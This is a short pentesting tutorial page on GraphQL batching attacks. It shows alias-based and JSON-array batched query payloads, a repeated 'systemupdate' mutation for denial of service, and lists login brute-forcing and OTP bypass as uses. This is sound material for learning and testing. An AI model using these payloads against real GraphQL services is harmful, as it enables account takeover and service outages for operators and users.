😎Batching Attacks

Batching in graphql simple means that many graphql operation can be performed in a single request. Using this vulnerability attacker can perform brute-force on login or can make service unavailable.

Types of Batching attacks :

query name based batching
query json based batching

👏Query name based batching

In this type of attack multiple queries with same operation name are grouped together and send in a single request.

{"query": "query{
  first:character(id:2){
    name id
  }
  second:character(id:3){
    name id
  }
  third:character(id:3){
    name id
  }
}"
}

Flaw : If we send multiple queries to an operation, such as a system update, which takes time to execute, exploiting this could lead to a denial of service on the GraphQL server.

mutation{
    first:systemupdate
    second:systemupdate
    third:systemupdate
}

👏Query json based attack

In this type of attack multiple queries are send as an array in the JSON format to the graphql server in a single request.

[
  {
    "query": "query { user(id: 1) { name } }"
  },
  {
    "query": "query { user(id: 2) { name } }"
  }
]

Flaw : same as query name based batching.

Scenarios Of Exploiting GraphQL

brute-forcing login
2FA bypass [bypassing OTP using batching]
Denial of services using heavy queries [system update]

MORE RESOURCES :

PreviousIntrospection schema NextCSRF

Last updated 1 year ago